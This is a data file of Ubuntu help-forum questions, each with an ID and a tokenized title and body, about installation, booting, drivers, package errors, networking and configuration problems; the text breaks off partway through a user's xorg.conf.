-- -- -- -- -- -- -- -- -- -- -- -- -- --
375709	unable to add/edit keyboard shortcuts in xfce4	i am attempting to edit existing and add new keyboard shortcuts in ubuntu 12.10 running xfce 4.10 . when i attempt to add a new keyboard shortcut via settings > keyboard > application shortcuts , the screen shown when clicking + add has a field entry for the command , but nothing for the shortcut ( no input field is shown , just a blank area ) . any advice ?
375716	how to play vp9 videos on ubuntu	so i have a vp9 video and i can not play the video on ubuntu 13.10 audio works because it is vorbis . i have compiled ffmpeg version git-2013-11-01-ec5e02d and i know that it supports vp9 thank you in advanced
375720	node executables not doing anything	i have some node executables installed on an ubuntu server but whenever i try to execute them nothing happens . i do n't even get an error message . i know they 're in my path because which executable_name works . when i do which -a node i get two outputs : /usr/sbin/node /usr/bin/node i feel like this has something to do with the problem but i have no idea what to do . help .
375722	use wubi to install downloaded iso	i recently downloaded ubuntu 12.04 lts amd64 to my windows machine , because i would like to install it on several similar machines , however , when i extracted the iso and ran wubi , it made me download ubuntu again . any ways around this ?
375729	get rid of context-menu scrolling	these things annoy me , i would like to disable the behaviour of scrollable context menus , or at least increase the limit of the number of items which can be shown before they become scrollable menus . see below for an example of what i mean ( this is a screenshot of the right-click menu on .zip file on my gnome desktop in ubuntu 13.10 )
375730	dash online-search set to off -- why does dash still search online ?	is this a bug ? do i have to disable some additional settings ? i 've set the system settings option to off . yet my dash still says it searches online sources .
375735	ca n't get android phone recognized in ubuntu 12.04.3	good evening , thank you in advance for your time and helping me with my question/solution . i recently upgraded from ububtu 10.04 lts to 12.04 lts . when i was using 10.04 , i was able to plug in my android phone and lucid would instantly recognize i had plug it in and was able to read off my sd card . this is not the case in precise as it was in lucid . precise does not recognize my phone/sd card at all . does anybody have a solution ( s ) for this issue ? my phone information is a samsung model sph m820 bst android version 2.3.6 kernel version 2.6.35.7 build number gingerbread ff19 this can not be an issue with the phone its self , cause as i still have lucid installed on one of my hdd 's in my computer , if i boot up in lucid , plug the phone into the usb cable as usual , the phone would ask me if i want to charge or mass storage , i choose mass storage like usual and lucid still recognizes it like usual . but not precise . phone asks me `` charge '' or `` mass storage '' i choose mass storage and nothing . it is not listed under the `` places '' tab as it was in lucid as i am using ( gnome fallback ) in precise and the drive is not located in the `` computer '' folder either . any suggestions/solutions would be greatly appreciated . again , than you all for your time and your work you do here . thanks , bill
375737	webdav stops working after a few seconds	with ubuntu 13.10 , i connect to two different owncloud installations and can browse for only a few seconds before it freezes the connection and stops working . when i try to reinstate the connection it fails to even ask for the password ( ubuntu was told to forget the password ) . i did check the webdav connection through firefox on two computers and es file explorer on android . i know that this is n't a webdav problem and do n't know what is happening in ubuntu to stop being able to read the connection .
375738	ubuntu 13.10 installer making no changes to partition , even after complete	trying to install ubuntu 13.10 ( x64 package ) on a hp probook 4430s from usb made with unetbootin . intel celeron b810 dual-core x64 1.6ghz 4gb ram intel graphics hd 2000 320gb hdd - 3 partitions ( 1 with backup files - 40gb , 2 win7 that were dual-boot but no longer boot after attempting to install - 55gb and 222gb ) i am fine with losing the data on the 222gb partition , but when trying to install it only shows the 55gb and the 222gb , but the 222gb is not 222gb ... its including the 40gb backup . whatever , went through with the installation anyway . files can be replaced ( just backed-up games anyway . ) installation appears to run without a hitch on the now 222gb/262gb partition , formatted to ext4 with the installer itself . asks to reboot to begin using . upon rebooting , i get the gnu boot selection screen . press enter on `` ubuntu '' . get a `` gave up booting from root ... '' or something error . reboot and load `` try without installing '' option from usb . once booted , nothing has changed ! all 3 partitions are still present , all files intact . but now i ca n't boot my win7 55gb partition . everything in the `` try ... '' loader works perfectly . bluetooth , wifi , display adapter , sd card reader , hdmi-out , dvd drive , usb ports ... even reads correct battery data . help ?
375746	see network , but ca n't connect !	i see the wireless networks , but ca n't connect to them . i know it works because upon installing the os i connected to do the proper installation . please help !
375750	install raid 1 on existing system	does anyone know if the directions here will work with a 12.04 system ? if not , any other possible instructions would be appreciated .
375752	windows 7 and ubuntu boot/corruption problems	i searched around , but i could n't find the answer to why windows 7 ultimate 64x and ubuntu 12.04 lts 64x could n't live together happily on my asus g1s-x1 laptop . i had windows 7 ultimate 64x installed on the laptop when i bought it ( bought it used , it comes with vista new ) and i wanted to try out ubuntu and see what all the hype about the free os was . i installed ubuntu on an external 80gb iomega hdd with windows 7 on my main drive . they both work fine for about 2-3 weeks , until ubuntu suddenly is unable to boot . a few days after ubuntu fails , windows corrupts majorly ( winload.exe , ntkrnlpa.exe , and various others corrupt randomly ) and windows recovery environment is completely useless . booting to a live usb with ubuntu and trying to reinstall it fails , and trying to wipe the main drive and install it there fails as well ( something about my graphics card . ) i managed to get windows 7 ultimate 64x back up and running ( after many disk formats ) but now i am left with a broken ( and invisible ) ubuntu installation on the external drive . is there any way to get the broken and non-bootable ubuntu installation off the hdd without damaging or erasing the many files and programs installed and stored on the 80gb drive ?
375753	system error , ubuntu 12.04	e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/mirror.neu.edu.cn_ubuntu_dists_precise-security_universe_i18n_translation-en e : the package lists or status file could not be parsed or opened .
375755	problems in unetbootin : ( i.e infinite timer , no options , and failure to boot )	after following all instructions i can find , unetbootin still does this every time . every time i try to boot from a unetbootin usb disk the screen shows `` default '' , '' select option '' , and an 10 second timer lopped indefinitely . does anyone have a solution ?
375756	problem on static link to libsmbclient.a	i 've tried to develop a library using libsmbclient-dev to access net share folders . i wish to static link libsmbclient.a in my project , but a lot of error happens when i tried to static link it , it seems that the libsmbclient.a does n't include some objects it needed , while everything goes well with libsmbclient.so . because my project need to support various linux versions like centos , ubuntu ... , we wish not to install libsmbclient-dev everywhere . can anybody tell me that if i can static link this libsmbclient.a in an easy way ? or what kind of installation strategy should i take to cause less trouble to users ? if anyone have use this library to develop projects before , can you tell me how you deal with this case ? thank you very much ! ! !
375757	how to freshly install ubuntu 12.04 deleting both ubuntu 12.10 and windows xp	in my laptop , i have both windows xp and ubuntu 12.10 . now , i wish to delete both and freshly install ubuntu 12.04.. i 've already taken backups of my data.. now i just wish to remove the os and then install ubuntu 12.04 booting from a usb drive . any help will be highly appreciative . thanks kalyan
375758	grub rescue dual boot problem	here is the link to trace . im not sure why i cant boot . it says no errors at the bottom of the trace . http : //paste.ubuntu.com/6403264/ anyway i am dual booting win8 and ubuntu 12.04. i had to reinstall ubuntu and thats when i got the error . the first install of ubuntu was fine . i was able to follow the boot repair steps easily . but then the second time if freaked out with a grub rescue screen . if anyone can understand the trace and help that would be great ! thanks ! !
375760	mount error = 5 when mounting ceph cluster	im using maas and juju to configure a small 3 node test cluster . i have followed the ceph charm read me instruction . now i want to mount the ceph cluster . i 've created a secret file from the /etc/ceph/*keyring on the ceph clients . when i try the mount , it takes several minutes and comes back with mount error = 5 $ mount.ceph nkant.ceph : / /mnt -o name=admin , secretfile=root.secret mount error = 5 input/output error a google search on this tells me the issue is due the no mds process responding . i 've taken a look on the ceph nodes and there does not appear to be any trace of an mds process . should mds have been installed as part of deploying the ceph charm or am i missing a step somewhere ? could this be an issue here ? my ceph health is health_warn : $ ceph -s health health_warn 6 pgs degraded ; 6 pgs stuck unclean monmap e2 : 3 mons at { a8nke=192.168.2.21:6789/0 , f7fby=192.168.2.22:6789/0 , nkant=192.168.2.23:6789/0 } , election epoch 6 , quorum 0,1,2 a8nke , f7fby , nkant osdmap e7 : 3 osds : 3 up , 3 in pgmap v112 : 192 pgs : 186 active+clean , 6 active+degraded ; 0 bytes data , 3103 mb used , 21439 mb / 24542 mb avail mdsmap e1 : 0/0/1 up
375763	how to install realplayer video player	i need special permissions to install realplayer video player , which is listed as of unknown origin in the ubuntu software center . how do i install realplayer ?
375768	unable to run make menuconfig	when i am using the command make menuconfig , then its showing sharath @ sharath : ~/openwrt $ make menuconfig checking 'working-make ' ... ok . checking 'case-sensitive-fs ' ... ok . checking 'getopt ' ... ok . checking 'fileutils ' ... ok . checking 'working-gcc ' ... ok . checking 'working-g++ ' ... failed . checking 'ncurses ' ... failed . checking 'zlib ' ... failed . checking 'gawk ' ... failed . checking 'flex ' ... failed . checking 'unzip ' ... ok . checking 'bzip2 ' ... ok . checking 'patch ' ... ok . checking 'perl ' ... ok . checking 'python ' ... ok . checking 'wget ' ... ok . checking 'gnutar ' ... ok . checking 'svn ' ... ok . checking 'gnu-find ' ... ok . checking 'getopt-extended ' ... ok . checking 'non-root ' ... ok . build dependency : please install the gnu c++ compiler ( g++ ) . build dependency : please install ncurses . ( missing libncurses.so or ncurses.h ) build dependency : please install zlib . ( missing libz.so or zlib.h ) build dependency : please install gnu awk . build dependency : please install flex . prerequisite check failed . use force=1 to override . make : *** [ tmp/.prereq-build ] error 1 how can i resolve this ?
375769	implementing appropriate waiting mechanism for intterupt/signal handling	i need an executable running on my linux target machine , waiting for intterupts and telling about the source of interrupts . so leaving the details aside where i m stuck is the how to implement this `` waiting '' . i have done while ( 1 ) { sleep ( 1 ) ; } the problem is that when signal handler is invoked ( interrupt comes to kernel space , kernel space sends signal to my process ) , i have the following code in my signal handler void receivedata ( int n , siginfo_t *info , void *unused ) { printf ( `` \n**** signal received from gpio expander interrupt handler ****\n '' ) ; //note// printf ( `` now reading registers to find out which one interrupted % d time '' , count ) ; count++ ; read_register ( ) ; } the program goes to sleep after printing first printf line . i know the problem is with the sleeping mechanism i have used . can somebody suggest a work around . i had been stuck on this for a while . i saw some posts on busy waiting but could not get it working .
375772	a problem with graphic function of 13.10 unity desktop	it 's a little bit hard for me to describe my problem with words , look at the screenshot the images just can not fade away when they are supposed to so that they just mess up together .
375774	panel ubuntu 13.10 error	sometimes , my panel on ubuntu 13.10 ca n't showing time and date , and sometimes , my user too , so i ca n't shutdown my pc with this feature . why does this happen ? ? and how to fix it ? ?
375775	suddenly lost internet on all browsers	suddenly lost internet access via wireless and wired . i can ping the router and the dns server . all other computers connected to the router fine and internet is accessible . i can connect to the router from the computer in question . i have tried from 3 different browsers and i can not get to the internet . gateway is correct . please help ! !
375776	cant access nfs share with non-root user	i have mounted an nfs network share successfully using webmin . the share seems to be mounted correctly and working correctly . if i login as root i can browse the share just fine . however , i can not seem to give another user access to read/write to this network share . when i look at the permissions i can see that it is owned by root and the group crontab can use the share . $ ls -las 4 drwxr-xr-x 3 root root 4096 nov 11 23:35 . 4 drwxr-xr-x 23 root root 4096 nov 11 23:35 .. 8 drwxrwx -- -+ 23 root crontab 4096 feb 15 2013 private so just to test thing out , i added crontab to my user scott . $ groups scott adm cdrom sudo dip plugdev crontab lpadmin sambashare however i still ca n't access the share . $ cd private/ -bash : cd : private/ : permission denied any ideas ?
375777	how to recover songs from an ipod in ubuntu ?	i replaced windows with ubuntu 13.10 and my data is gone.now my only hope is my ipod.but i dont know how to recover songs from an ipod.please give me some guidance for recovering my songs from ipod .
375781	i need help in installing ubuntu alongside windows 7	i 'm using hp pavilion g6 laptop with amd processor . previously i had windows 7 and ubuntu 12.04 running perfectly in wubi . now i want to install ubuntu 13.10 in the same manner . it extracts some file on c : \ubuntu directory and also shows booting option in windows grub but when i choose to boot ubuntu it returns an error like `` unable to find media containing live file system '' . if i insert usb/dvd then it boots but in a live session only . it also gives me option to install ubuntu 13.10 . i tried this option then ubuntu cant detect my windows partition . i have four partitions . apart from this one partition is shown as logical drive and other three as primary partitions . i 'd appreciate any help .
375782	ubuntu server network settings for public access	i set up a server at home and bought a domain name in order to host a simple website . i bought the name from namecheap , am using using their default dns nameservers and set up url-forwarding to my home network 's ip address . i 've also pointed port 80 to the server in my router . all that allows me to access the server in my home network either typing in my ip or the domain name . however , if i use a foreign proxy or try to access it from outside the network by typing in the domain name then the search wo n't resolve . on the server 's side the network configuration is changed to static , but i 'm not sure whether the 'dns-nameservers ' details are correct . am i right thinking they should point to namecheap ? and do i need to set the my domain name within the server too ? thanks ! evert
375783	computer boots into grub rescue mode	i recently dual booted my computer to have windows 7 and ubuntu 13.10 on it . i later decided that i did n't want ubuntu so in win 7 i went to disk management and deleted 2 volumes that were not their before i made an ubuntu partition and then when i restarted my computer all that came up on the screen was error no such partition grub rescue > what does this mean ? what do i do to either boot into windows or linux ? any help is appreciated i am very new to linux thank you !
375797	ubuntu one file sync does not work on 12.04	i am experiencing file sync failure in ubuntu one at 12.04 for about one month it happened without any notice and still continues . < > when i launch ubuntu one , file sync does not start . when i click `` sync file '' button in top right , it says `` auth failed ( auth_failed ) '' and gives dialog `` i am sorry but we need to close ubuntu one due to erros '' ( message in japanese , so this is my translation ) , with the following output : unauthorizederror u'\u30db\u30b9\u30c8\u306e\u8a8d\u8a3c\u304c\u5fc5\u8981\u3067\u3059' u'oauth required ( mandatory ) . ' ( it seems that these strings are unicode character , possibly utf-8 string . it that japanese file name ? ) no account information and current service displayed . by clicking `` edit service online '' button , web page shows only `` oauth required ( mandatory ) . `` , possibly authentication error . < > i re-installed all related packages to ubuntu one ( tried to remove settings ) , and produced no improvement . i also removed all files possibly related to ubuntu one manually by : sudo rm -rf ~/.local/share/ubuntuone rm -rf ~/.cache/ubuntuone rm -rf ~/.config/ubuntuone mv ~/ubuntu\ one/ ~/ubuntu\ one.orig/ and restarted computer . these procedures brought no betterment for this inconvenience . moreover , my another ubuntu instance ( also 12.04 ) met the same ubuntu one error today and it still continues . does anyone suggest solution or at least the reason ? thanks ,
375798	install ubuntu in vmware 7.0	i wan na install ubuntu-12.10-desktop-i386.iso in vmware 7.o x86 in win7 64bit but after added in vwmware a black page with a dash appear what can i do ? i try repeat it with ubuntu-11.10-dvd-i386.iso after i select language and after that install ubuntu this error appear error 8000 reading sector 761961 invalid or corrupt kernel image plz help me soon tnx
375801	unknown filesystem , grub rescue	when i try to boot i get this message : error : unknown filesystem . grub rescue > _ results of : grub rescue > ls are as follows : ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) ( hd1 ) ( fd0 )
375802	desktop enviroments : lock screen widgets availability	i use two awesome de for me ( mate and cinnamon ) . also i like kde but not too much . but this question about not desktops but lock screens . can anybody answer , is it possible to add widgets ( like time/weather/other things ) to lock screen ? i am suppose that this function already in latest version , but do n't know about it . info : now i have mate 1.6.0 and cinnamon 1.4.0
375806	how to `` convert '' running ubuntu server to boot able iso	i have an ubuntu 12.04.3 server , i have configured the server and customized the packages inside a vm ( vmware virtual machine ) and now i need to `` remaster '' the system so that i would be able to export the machine as a `` new '' distribution inside our company . here is my problem , all the known re-mastering tools require a graphical component to initiate ubiquity , as this is a server , it does not have any graphical mw installed , so , how can i achive that ? also , i 've read about an option to chroot into the iso file , will that be a good path to follow ?
375807	usb powered apple pro speakers do n't work	i just found my old apple pro speakers . those speakers are attached to an external usb sound card with integrated amplifier . when i plug-in the speakers to any usb port ubuntu recognizes them and displays them in the sound settings panel . the little amplifier also features a 3.5mm jack , when i plug in headphones they work . but i do n't get any amplified sound out of the speakers . any suggestions ? i 'm using ubuntu 12.04 lts .
375808	why is k9copy no longer in use ?	trying to install this under 13.10 , but see it has n't been updated since 12.10 - is it no longer worth using ? if it is , how do i install manually on 13.10 ?
375809	determine if an ubuntu server has shutdown	all i know is , i 'm trying to ssl in and it keeps refusing my connection . has my vps indeed been shutdown ? luckily this is just a test vps i have for such matters , but i do n't know why this would happen . this last command i ran was this erroneous `` command '' i ran as root , before i was locked out . pumactl -c unix : //var/run/my_app_sock status [ status|restart|halt|stop ] restart : missing job name try `restart -- help ' for more information . broadcast message from root @ vps ( unknown ) at 2:01 ... the system is going down for halt now ! no command 'stop ] ' found , did you mean : command 'stop ' from package 'upstart ' ( main ) stop ] : command not found root @ vps : /config # connection to 1.2.3.4 closed by remote host . connection to 1.2.3.4 closed . it 's just strange..that command 's erroneous , and would n't have thought it would shut the vps down like that ... did the broadcast message simply appear inside the output ? have i just shut down my vps ? edit do you know what , on reflection , i think i have . ha . will i have to contact my vps provider ? can i somehow start it again ?
375810	menubar is separate after unity reset	after unity -- reset it looks like this . have n't found anything like this in compiz config manager . thanks . 12.04 lts .
375811	disable screensaver ( black screen ) in ubuntu 12.04	background : i have an application which is running on top of ubuntu 12.04 . when i boot up the device , it will automatically open the application and running until power off the device . problem : when the application is on idle state display is going to off mode ( black screen ) . i need to disable that behaviour from the os . what i have done so far : the brightness and lock as follows , i run following command in the terminal also , gsettings set org.gnome.desktop.screensaver idle-activation-enabled false but still my problem remain same . any idea how can i fix this ?
375815	the entire user interface freezes/becomes unresponsive for up to 20 seconds	i am a rails developer , using ubuntu 13.10 installed on a asus s550c ultrabook ( was a windows 8 machine originally ) every day i work with sublime text 2 , google chrome , and terminal ( about 6 tabs open ) the problem : clicking on the menu bar ( eg file - > save ) while using sublime text 2 will occasionally ( eg almost always ) make the entire computer freeze for up to 20 seconds . this occasionally happens when i go to log out / lock my computer . sometimes it does n't freeze completely but rather is just very sluggish and then recovers . i do n't know if this is a problem with sublime text 2 , or the ubuntu 13.10 operating system . ( thanks for reading ) best regards
375817	unable to make multi-boot installation with windows 7 - 32 bit and ubuntu 13.10	i tried to install ubuntu 13.10 alongside windows 7 . when i try to install ubuntu alongside windows 7 my system restarts and the dvd drive ejects . what should i do ? please assist me
375818	booting ubuntu from a usb drive	i recently purchased a sony vaio pro 13 and want to boot to ubuntu 13.10 from my usb drive . the os is windows 8 . i have n't upgraded to windows 8.1 can someone provide a step by step guide ? i 'm new to ubuntu
375819	how can i disable drag-copy of text ?	instead of allowing me to change my selection within a highlighted area with the mouse cursor , it attempts to perform a drag and drop operation with the currently selected text , copying the text to a new location . i am unable to discover the location of this setting . how to revert it back to a more `` classic '' behavior , ( i.e . clicking and dragging within a highlighted area changes the start and end points of the selection ) .
375823	dpkg is broken , how to recover ?	when i ran apt-get , the system said that dpkg is broken , use sudo dpkg -- configure -a to recover , but when i ran sudo dpkg -- configure -a , it showed the following error message : dpkg : error : liboil0.3 : amd64 0.3.16-1ubuntu2 ( multi-arch : no ) is not co-installable with liboil0.3 which has multiple installed instances how do i fix this ? please help .
375826	keyboard does n't work with tor browser	i use the actual tor browser 2.3.25-14 and ubuntu 13.10 ( saucy salamander ) . i start tor in the command-line window ( ./start-tor-browser ) . the cable less keyboard and mouse ( logitech ) are working , the vidalia control panel opens , after having connected to the tor network , the tor browser window ( firefox ) opens automatically . the onion is green , everything ok . but the keyboard does n't work in the tor browser window , the mouse , yes , does work . when i close tor with the vidalia control panel and open another application , the keyboard works again . is there somebody who can help me or at least understands the problem ? thanks a lot !
375827	how to setup xdm to use kerberos without pam ?	i know i could do this via pam . but i see krb5 support in xdm souce . and xsecurity says so , too . then my question is , how ? i can not find a step by step document on this .
375828	how to update libreoffice ?	i am using ubuntu 13.10 . is there a way to update libreoffice ? i do n't mean remove this version and do a fresh install of a new version ! i do n't want to waste my internet . i want to just update it .
375829	canon lbp 2900 successfully installed in 12.04 but not working	i have successfully installed canon lbp 2900 in 12.04 32 bit but printer is not working . everything is right but printer is not responding .
375831	ubuntu tweak and mozilla ( firefox and thunderbird ) cache	i usually use ubuntu tweak to do cleanup jobs on my pc . this includes apt and program cached data and old kernels . this goes alright for most programs except mozilla based application - firefox and thunderbird . ubuntu tweak does n't seem to know where their cache folders are and always returns 'zero packages can be cleaned ' even when the cache folder is full . check screenshot below : i am looking for a way to clean up all my cache data and unneeded packages at one point . if someone knows how to change the ubuntu tweak cache folders for firefox and thunderbird , that would be perfect . i tried bleachbit last but it crashed my pc to a point i had to re-install ubuntu . i am using ubuntu tweak 0.8.6 . edit same issue with the screenshot of this question : why is n't ubuntu tweak 's janitor working ? edit 2 for the python programmers out there , this answer shows the commands that ubuntu tweak janitor runs to clean up the system . maybe something in there will shed more light to this issue .
375832	how to get longest line from a file ?	i 'm interested to find out the line number of the longest line from a file . for example , if i have a file with the following content : lalala tatatata abracadabra mu mu mu how can i write a bash script that will give me an output something like this : 3 - > abracadabra ?
375833	it automatically select last username on login screen	in ubuntu 12.04 after last updates , the system auto select the last username enter in machine and only ask for password . how i can change that ? i want it ask for username and passwork like before updates .
375837	a long suppot version of ubuntu with gnome 3.10 !	i wan na have ubuntu like 12.04 ( .1 or .2 or .3 ) for its long support , but unity is so slow in my pc , i think gnome is better is there any `` 12.04 image with default gnome 3.8 desktop '' for download ? ? my pc is amd64 and 2g of ram and 1g vga
375839	unity3d game packaging service	please , i heard that ubuntu provides service to package unity3d games , is it still true and where can i find info about it ? thank you , marek .
375841	ubuntu 13.10 - black screen after logging in after installing nvidia drivers	i recently installed ubuntu 13.10 in a dual-boot with windows 7 , so i 'm still quite new to using linux . most things were working fine , and i could log in normally ( apart from the first login after install , which spent about 2 minutes on a black screen before going to the desktop ) . i installed the restricted nvidia drivers with the command : sudo apt-get install nvidia-current since then , after i enter my password and log in ( the login screen itself works perfectly ) , i get a black screen with the cursor and nothing happens from that point onwards . basically , what i would like to know is how to get back to the normal ubuntu desktop and ( hopefully ) still be able to use nvidia drivers .
375843	ca n't control screen brightness 13.10	i do n't seem to be able to control the brightness in neither the settings or through the shortcut , it shows me that it changed but it appears that it did n't .
375844	kernel downgrade after update broke my system	i need to downgrade from 3.8.0-33 to version -29 . after booting the latest kernel i 'm greeted by a black screen . how do i keep this version permanently ? output of dpkg -l linux-image* gewünscht=unbekannt/installieren/r=entfernen/p=vollständig löschen/halten | status=nicht/installiert/config/u=entpackt/halb konfiguriert/ halb installiert/trigger erwartet/trigger anhängig |/ fehler ? = ( kein ) /r=neuinstallation notwendig ( status , fehler : gross=schlecht ) ||/ name version beschreibung +++-==============-==============-============================================ un linux-image < keine > ( keine beschreibung vorhanden ) un linux-image-3 . < keine > ( keine beschreibung vorhanden ) ii linux-image-3 . 3.8.0-29.42~pr linux kernel image for version 3.8.0 on 64 b ii linux-image-3 . 3.8.0-33.48~pr linux kernel image for version 3.8.0 on 64 b ii linux-image-ge 3.8.0.33.33 generic linux kernel image sorry it 's german .
375850	how to type in hebrew in ubuntu 13.10 ?	i 've just installed ubuntu version 13.10 and i do n't know how can i type in hebrew , please help .
375852	sony vaio sve14135cnb dual boot help ?	i am new to askubuntu forum ! ok , my problem is to install ubuntu or any linux os along with windows 8 in uefi mode . so , i want to swipe all my 500gb hard disk and wanted to reinstall windows 8 , ubuntu in legacy mod . but my doubt is , if swept my whole hard disk , dose assist button works properly to view bios settings and vaio rescue center ? please help me , i was tired of searching for solution . thanks in advance ! ! ! ! ! !
375853	problem with installing ubuntu ; stays on the loading screen	i have a problem when i boot from the cd , it stays on the loading screen . so what must i do ? details ; version : 13.__
375854	session user login problem , when i wake-up my laptop from suspend	after i upgraded to 13.10 , there are many few problem about login when i wake-up from suspend , after i have done the other activity . illustration : when i wake-up from suspend in my laptop and i login and enter my password on it , then i use for my activity ( like surfing , make documnets , etc ) . after approximately 5 - 10 seconds in activity , it turned back into blank screen and log-out automatically itself suddenly . can anyone resolve it ?
375855	ubntu and lubuntu issues	ive finally managed to install ubuntu 13.10 on my acer aspire one netboot with a atom processor . this must have been sorted in a recent update . ive installed ubuntu , however its very slow and much slower then windows 7 . ive tried installing lubuntu but lubuntu seems to disappear and reverts back to ubuntu as soon as i login . why is this ? i have 2gb ram , and im looking for ways to really speed up ubuntu because right now it seems like it struggles to render visual effects such as when i click on the `` shutdown '' button and the popup comes up prompting me to restart or shutdown . any ideas much appreciated ! cheers
375857	where can i find the power management settings ?	how can i change the energy savings settings ? i want the program to turn off the screen after three minutes and go on stand-by after 7 minutes . thanks
375858	unable to install any software using sudo command	i am unable to install any software using sudo command ; rahul @ rahul-vpcea33en : ~ $ sudo apt-get install vlc e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
375859	how to start /usr/bin/bitcoind on boot ?	i 'm trying to get /usr/bin/bitcoind to start on boot but without success . i have this script on /etc/init/bitcoind.conf description `` bitcoind '' start on filesystem stop on runlevel [ ! 2345 ] oom never expect daemon respawn respawn limit 10 60 # 10 times in 60 seconds script user=andre home=/home/ $ user cmd=/usr/bin/bitcoind pidfile= $ home/.bitcoin/bitcoind.pid # do n't change anything below here unless you know what you 're doing [ [ -e $ pidfile & & ! -d `` /proc/ $ ( cat $ pidfile ) '' ] ] & & rm $ pidfile [ [ -e $ pidfile & & `` $ ( cat /proc/ $ ( cat $ pidfile ) /cmdline ) '' ! = $ cmd* ] ] & & rm $ pidfile exec start-stop-daemon -- start -c $ user -- chdir $ home -- pidfile $ pidfile -- starta $ cmd -b -m end script after creating this script i 've run the command : sudo initctl reload-configuration when i restart ubuntu the `` bitcoind '' does not start . i only can start `` bitcoind '' running manually the command : sudo start bitcoind any clues on how to start `` bitcoind '' on boot ?
375862	triple boot pear os , ubuntu 13.04 saucy salamander , windows 7	o.k . so i already have ubuntu and windows on dual boot , and i have created another partition ( fat32 ) to install pear os using g-parted . however , when i attempt to run the install disc : it does not have the option to install alongside windows ( and when i select the partition i made using the 'something else ' option , i get the error 'no root specified , this can be fixed in the partition menu ) when i have my gflex seagate external harddrive ( which has been partition into 2 drives - both ntfs - and one has no data , the other backup files ) attached , it recognises it and gives me the option of install alongside windows , however when i get to the stage where it asks me to allocate the drive space it freezes . now i can only assume that i have partitioned my hdd in such a way that the pear os does not recognise the partition , because it still recognises the external hdd . now the question is : what have i done wrong , and how can i fix it to run all three operating systems ? or , alternatively : if i must replace windows 7 with pear os ( which , fortunately is an option ) , is there a way to preserve the ubuntu partition so as to dual boot ubuntu and pear ? all help is appreciated , however , if you are going to recommend i just apply a skin to my already installed ubuntu , please do n't as i have already done so and it does not have the same effect . thanks for your help : p
375864	how to install utorrent 3.3 in ubuntu 13.10 ?	i dont know how to install utorrent in ubuntu.please provide guidance for utorrent installation
375866	installation asks me to select `` network '' but displays network interface cards	during ubuntu installation : does this make any sense ? was it supposed to show available networks , but somehow shows smth different ? if not , what is going on then , and what is the password for my wireless network interface card ?
375867	how to access a folder through the terminal	i 'm trying to follow this answer in getting my wireless to work . however i 'm incredibly new at the whole linux thing , and there is a part in there that i really just do n't understand : go to your main extracted folder ( it should be the dpo_rt3290_linuxsta_v2600_20120508 folder ) and type the following : make sudo make install when he says `` go to '' , does he mean go to the file window ? wen i 'm there and type `` make '' and hit enter , it just opens up the file . how exactly am i supposed to make this thing work ? what he is trying to say ? i really just do n't get it . can somebody help me to understand this , so i can get my wireless working .
375868	fade out moc if other application starts playing something	i need to find a good way to force fade down the sound playback of a moc daemon i have the following scenario : i have running a small ubuntu 12.04 server box with a moc ( musiconconsole ) daemon and a custom ruby application . the ruby application occasionally plays a wav or other soundfile in periodic or event driven scenarios . e.g . at 7 p.m. it plays `` store_is_closing.mp3 '' or something like that . i also have a moc daemon running with a mp3 playlist , which plays music the whole day . i am using alsa to do the mixing . everything works fine but i am missing one point . if , let 's say moc is playing a song and the ruby app plays a sound file , everything is on the same sound level ( obviously ) . so , you ca n't understand anything of the sound file played by the ruby app . i need to find a way to force the moc daemon to fade down his playback of the song to a defined percentage ( let 's say 10 % of the original sound level ) and after the ruby app played the sound file , moc should be toggled back back to the origin sound level .
375869	installation problem !	i am trying to install ubuntu onto oracle vm virtualbox which i 'm running on a windows vista laptop . i have gotten to the point of 'who are you ? ' then once i hit 'continue ' and wait for the bar to loaf it gets all the way to the end and then nothing.. there is a white round load symbol that i think was the mouse pointer but when i even put my mouse over the screen it does n't come on the screen unless i 'm pointing at the frame of the page so the scroll bar and menu options . this is the second time i 'm trying this and it is stuck at the same spot again . what can i do about this ? and why is it happening please thank you in advance for your advice
375870	update lxc in ubuntu server	i have installed lxc-version 0.7.5 by apt-get update apt-get install lxc now i want to update to either lxc-0.8.0 or lxc-0.9.0 . how can i do this ?
375872	computer takes too long to wake after 13.10 update	right after i updated to 13.10 when i log in after booting a black screen with only the mouse visible occupies the screen for a period of time .
375874	does kingsoft office official ppa exist ?	kingsoft office has better supporting of microsoft office than libreoffice . but it 's annoying every time when new release published to download and install it manually . so , does kingsoft office official ppa exist ?
375876	ubuntu 13.10 dual amd gpu dual wqhd screens second screen only displays white with x for cursor	i 've got 2x hd6850 's with 2 1440p screens setup as one monitor per card . there is a crossfire bridge in , without it the second card or monitor are not detected . the issue is that the second screen displays a pure white screen which i can mouse into , the mouse just turns into a cross and no windows can be moved to it . i 've unplugged the screen re-initialized xorg.conf ( with sudo aticonfig -- initial ) replugged things in ( last time i did this the resolution settings maxed out at 1600x1200 ) ; the best i can get is the same old white screen . i 'm thinking that i 've got some error in my xorg.conf file , but fixing it on my own is beyond me . my xorg.conf file is below section `` serverlayout '' identifier `` aticonfig layout '' screen 0 `` aticonfig-screen [ 0 ] -0 '' 0 0 screen `` aticonfig-screen [ 1 ] -0 '' rightof `` aticonfig-screen [ 0 ] -0 '' endsection section `` module '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 0 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` aticonfig-monitor [ 1 ] -0 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' endsection section `` monitor '' identifier `` 0-dfp6 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 2560x1440 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` monitor '' identifier `` 1-dfp6 '' option `` vendorname '' `` ati proprietary driver '' option `` modelname '' `` generic autodetecting monitor '' option `` dpms '' `` true '' option `` preferredmode '' `` 1600x1200 '' option `` targetrefresh '' `` 60 '' option `` position '' `` 0 0 '' option `` rotate '' `` normal '' option `` disable '' `` false '' endsection section `` device '' identifier `` aticonfig-device [ 0 ] -0 '' driver `` fglrx '' option `` monitor-dfp6 '' `` 0-dfp6 '' busid `` pci:1:0:0 '' endsection section `` device 